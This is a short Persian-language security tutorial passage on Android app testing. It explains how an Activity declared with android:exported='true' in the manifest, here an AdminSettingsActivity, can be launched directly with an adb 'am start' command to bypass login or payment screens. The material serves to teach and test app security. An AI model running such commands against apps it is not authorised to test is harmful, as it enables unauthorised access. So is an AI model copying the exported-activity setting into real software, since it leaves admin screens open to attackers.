۱. فعالیتها (Activities): دور زدن صفحات لاگین
Activityها همان صفحات برنامه هستند. بزرگترین ریسک اینجا "دسترسی مستقیم" است.
- سناریو حمله: فرض کنید اپلیکیشن یک صفحه به نام
PaymentActivityدارد که فقط بعد از پرداخت موفق باید باز شود. اگر این صفحهexportedباشد، مهاجم با یک دستور ساده آن را باز میکند. - مثال در مانیفست:
xml
<activity
android:name=".AdminSettingsActivity"
android:exported="true">
</activity>کافیست از دستور زیر استفاده کند com.target.app نام پکیج است و AdminSettingsActivity نام کامپوننت ای که قصد باز کردنش داریم.
bash
# باز کردن مستقیم صفحه تنظیمات ادمین بدون داشتن دسترسی #
adb shell am start -n com.target.app/.AdminSettingsActivity